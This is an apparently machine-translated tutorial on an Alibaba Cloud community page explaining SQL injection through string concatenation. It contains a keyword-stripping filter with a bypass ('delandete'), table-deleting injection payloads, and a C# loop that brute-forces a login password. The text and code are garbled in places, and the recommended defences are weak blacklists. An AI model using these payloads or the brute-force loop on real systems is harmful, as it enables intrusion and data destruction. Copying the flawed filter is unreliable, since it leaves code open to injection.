Analysis of SQL injection principles and brute-force web password cracking code

Source: Internet
Author: User
Tags sql injection

If this method of SQL injection occurs, it must be the SQL concatenation used in the program, and the user's input form parameters are not filtered or url parameters are not filtered.

There are basically two ways to splice SQL statements:

1, such as SQL = "select * from table where id =" + input parameter; format

This is the best precaution. You only need to verify the number of input parameters. If you ignore the verification here, the consequence is the most serious. Even if you filter the parameters in single quotes, filter the equal signs, and filter the SQL keywords, it is useless.

Without digit verification, the SQL statement may become


Select * from table where id = 10 delete from table

Serious, but I may have filtered out keywords.


  

Public static string safesql (string str)
{
If (string. isnullorempty (str ))
{
Str = "";
Return str;
}
Else
{
Str. replace ("'","");
}
Str = new regex ("exec", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("xp_mongoshell", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("select", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("insert", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("update", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("delete", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("drop", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("create", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("rename", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("truncate", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("alter", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("exists", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("master.", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("restore", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("=", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("or", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("and", regexoptions. ignorecase). replace (str ,"");
Return str;
}

It is case-insensitive, but what if my input parameter is 10 delandete from table ??

Haha, the method is used. Because it filters out and in delandete and becomes delete again.

But how do hackers know the filtering order? The most common and useful method for hackers is to try it. You don't need to try it several times.

This method can also be used in the following ways:

2. Splicing with single quotes

SQL = "select * from table where name = '" + parameter + "'Order by id desc"

SQL = "select * from table where name = '%" + parameter + "% '"

The input parameter is feng'delete from table select 1 from table where 1 = '1


Use single quotation marks to end the range of the single quotation marks. Add your own statements and splice them later.

For such injection, to insert your own SQL statement, you must add a single quotation mark to end the range of the previous single quotation marks, so it has its own dead point, you only need to filter out single quotes.

There is a more absolute way to replace the single quotation marks entered by the user with two, so that the input statements do not have an execution environment and it feels safer.

SQL injection is so simple that it creates a very serious external environment, so we should have our own protection measures


The following is a brute force password cracking code.
Brute-force cracking: one by one try until the correct password is obtained.

 

Webclient web = new webclient ();
Web. encoding = encoding. utf8;
For (int I = 0; I <399; I ++)
             {
String s = web. downloadstring ("http: // localhost: 2118/website5/default. asp tutorial x? _ Viewstate = % 2fwepdwukmtyznzq1ndcxn2rkg804yc5o9vry7xclcoo1% 2 fuinvau % 3d & txtname = admin & txtpass = "+ I. tostring () + "& button1 = % e7 % 99% bb % e9 % 99% 86 & __ eventvalidation = % validate ");
If (s. contains ("login successful "))
                 {
Console. writeline ("password cracked successfully: password:" + I. tostring ());
Break;
                 }
             }
          
Console. readkey ();

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.